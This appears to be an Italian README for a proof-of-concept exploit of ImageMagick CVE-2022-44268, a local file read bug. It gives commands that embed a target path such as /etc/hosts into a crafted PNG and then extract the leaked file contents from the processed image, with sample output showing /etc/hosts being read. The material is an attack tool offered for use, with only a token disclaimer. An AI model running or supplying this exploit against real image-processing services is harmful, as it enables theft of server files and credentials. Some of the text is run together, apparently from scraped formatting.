
Genera file PNG dannosi per sfruttare la vulnerabilità LFI di ImageMagick (CVE-2022-44268) per la lettura arbitraria di file, con script di estrazione per la prova di concetto.
ImageMagick è una suite software gratuita e open-source multipiattaforma per visualizzare, convertire e modificare immagini raster e vettoriali. Può leggere e scrivere oltre 200 formati di file immagine. ImageMagick è rilasciato sotto licenza Apache 2.0. È disponibile sotto forma di strumenti a riga di comando, oltre che come API C e un insieme di classi C++. Wikipedia
ImageMagick versioni 7.1.0-40 e precedenti sono vulnerabili a una vulnerabilità di Local File Inclusion. La vulnerabilità è causata da una validazione impropria dell'input fornito dall'utente. Un attaccante può sfruttare questa vulnerabilità inviando un file PNG appositamente modificato al target. Lo sfruttamento riuscito potrebbe consentire a un attaccante di leggere file arbitrari sul sistema target.
Crediti ai ricercatori che hanno scoperto questa vulnerabilità:
Creare un PNG malevolo per sfruttare ImageMagick 7.1.0-40:
pip install Pillow)Creazione di un PNG con generate.py:
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png
______ __ _____ ______
| _ \ \ / / | __ \ | ____|
| |_) \ \_/ / | |__) |__ __ _ ______| |__ _ __ ___ __ _
| _ < \ / | ___/ _ \ / _` |______| __| '__/ _ \ / _` |
| |_) | | | | | | (_) | (_| | | | | | | (_) | (_| |
|____/ |_| |_| \___/ \__, | |_| |_| \___/ \__, |
__/ | __/ |
|___/ |___/
[*] ImageMagick LFI Exploit
[*] Embedding Payload to read the target file
[*] Exploit PNG generated: exploit.png
python3 extract.py downloaded_img.png
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Disclaimer: Sii buono, per favore non usarlo per scopi malvagi